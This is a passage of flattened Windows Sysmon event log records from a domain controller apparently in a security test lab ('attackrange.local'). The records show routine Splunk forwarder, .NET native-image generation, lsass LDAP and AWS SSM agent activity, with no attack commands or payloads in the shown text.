\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000019643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.854{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=6A5646CF18EF7AE7E9A5462676FA41AF,SHA256=84B3443C91D522A6F3C630E4922E596FD54199184F2F5EB640B4D86D59B1224B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.479{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FCEC7C7E036FD6A6E645AD600EE7DB4,SHA256=66675BAC66208FF0345E5F4ACCD6DD58A687DCEA2189AC38C01C14D298802AB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.385{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A16B-60D3-F802-00000000CF01}512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.370{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A16B-60D3-F802-00000000CF01}512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.370{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A16B-60D3-F802-00000000CF01}512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000019638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.354{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=1429D697A7AB617C76B44C2B7469EE5D,SHA256=ED3301689ACA32DE4F3D571D54D951136B97580089553AB01C710373BF4ED41F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.354{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=B920396E1D28C84D806079252F6D94E0,SHA256=FAFF9AD7AC40A818DE75CB967BC1F3B9FADBCAA572C3AFB3E512345E306DDDB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.182{4DB9351A-A167-60D3-F702-00000000CF01}2228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1IJ2EEVPAN\System.Data.ni.dll.auxMD5=C18156D66FE66E7DB4B7AC3D0A67A972,SHA256=715D0D95168A0C258DBFA12E04ACC5150D729AF0E8C3477085A78559B423C8DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.182{4DB9351A-A167-60D3-F702-00000000CF01}2228NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\1IJ2EEVPAN\System.Data.ni.dllMD5=B4E2B2F388EB5326957E362B7089F3EF,SHA256=E2C586AC15571A6026145B430677022B79B8E58BDE0F3664A986DA41B6951148,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:35.026{4DB9351A-A167-60D3-F702-00000000CF01}2228C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8b4-0\System.Data.dll2021-06-23 21:02:35.026 23542300x800000000000000019650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:36.510{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94A98BD943F4A87B458709D73E7748FD,SHA256=88FE433E6F50FB5B93C2B2017CE946BF543FD3212E0F265D7F5018B10932E164,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:35.314{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61385-false10.0.1.12-8000- 23542300x800000000000000019648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:36.323{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66E3749347A4E9CB3A66939D86F920BC,SHA256=9C63206890D3AA1BEEE0D7DEE848D5FF5CFB3EAB5FF95D255CCD5518EAA5953E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:36.323{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=0C229B89F63003D791C89B7A95F8D9FC,SHA256=622BDDE6AD239DA6991212E274B5A36F7863A77F517F80348A1BC4488B55FBE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:37.666{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C122AE571D4F55637B15932BE31B715,SHA256=BD0F8EE5C99FEE27F98E823C841E12B316D03276E1C99C9CC51C479541F2ABF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.682{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2002E286B75300780720A2EFA09E41C6,SHA256=C9191A32B776FCF43E77532627AD41CC7D9D4A5C5FCACCB0EAF913BE9DA9371B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019655Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:39.791{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C42D352109B6A13119BE18379149DA81,SHA256=4C766445C12E9BEFFF929BDB7B0ADCBFC89FC9FCDF8C87FCCE6A30791B907FD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019654Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:39.604{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=306CD73A7D23875FC8CB5C6FF24A3B53,SHA256=BAC917F5CC79E2FC68E87BEAB98E8985A85A4CEDE3BF69907EF1438FC0380270,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:39.073{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.816{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=533B03711CC354DE2857CD984A8072C0,SHA256=74312C05EB7BFC60D8DE3F1A9541689058F7B072CAF4AC2959F1633DEF0B1970,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.635{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61390-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019664Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.635{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61390-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019663Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.634{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61389-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.634{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61389-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.633{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61388-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.633{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61388-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.631{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61387-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.631{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetrue2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local61387-true2001:0:34f1:8072:18c1:3b8f:f5ff:fef1win-dc-663.attackrange.local389ldap 354300x800000000000000019657Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.627{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61386-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 354300x800000000000000019656Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:38.627{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local61386-truefe80:0:0:0:fdd4:2588:4c96:4409win-dc-663.attackrange.local389ldap 23542300x800000000000000019668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:41.895{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F41ED8AD32078BD6647C6B5016890C9,SHA256=91C4E843D7190DF890E98544C60DE457EF81C5B4CC43176261AA5C8EE0F3E971,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:39.110{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61391-false10.0.1.12-8089- 23542300x800000000000000019673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:42.910{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=849671DA75B19A7C53CF869EC64089A7,SHA256=AA9C06150F8D8EC7A37F4E5C0462AA45DA96030CC5AE0FA17661228E30CA6A81,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.738{4DB9351A-9DEC-60D3-3500-00000000CF01}3296C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61394-false169.254.169.254-80http 354300x800000000000000019671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.694{4DB9351A-9DEC-60D3-3500-00000000CF01}3296C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61393-false169.254.169.254-80http 354300x800000000000000019670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.692{4DB9351A-9DEC-60D3-3500-00000000CF01}3296C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61392-false169.254.169.254-80http 11241100x800000000000000019669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:02:42.707{4DB9351A-A16B-60D3-F902-00000000CF01}1688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\698-0\System.Windows.Forms.dll2021-06-23 21:02:42.707 23542300x800000000000000019684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.926{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84937EA3491254820AD912395AF8019D,SHA256=86D403C1C31897B684361BD14F4CD983FFF6DF0E4CADE522E980B2DD79336625,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000019683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:41.261{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61396-false10.0.1.12-8000- 354300x800000000000000019682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:40.866{4DB9351A-9DEC-60D3-3500-00000000CF01}3296C:\Program Files\Amazon\SSM\ssm-agent-worker.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61395-false169.254.169.254-80http 10341000x800000000000000019681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.816{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A173-60D3-FB02-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.801{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A173-60D3-FB02-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.801{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A173-60D3-FB02-00000000CF01}3492C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000019678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.254{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A173-60D3-FA02-00000000CF01}836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.238{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A173-60D3-FA02-00000000CF01}836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:02:43.238{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A173-60D3-FA02-00000000CF01}836C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 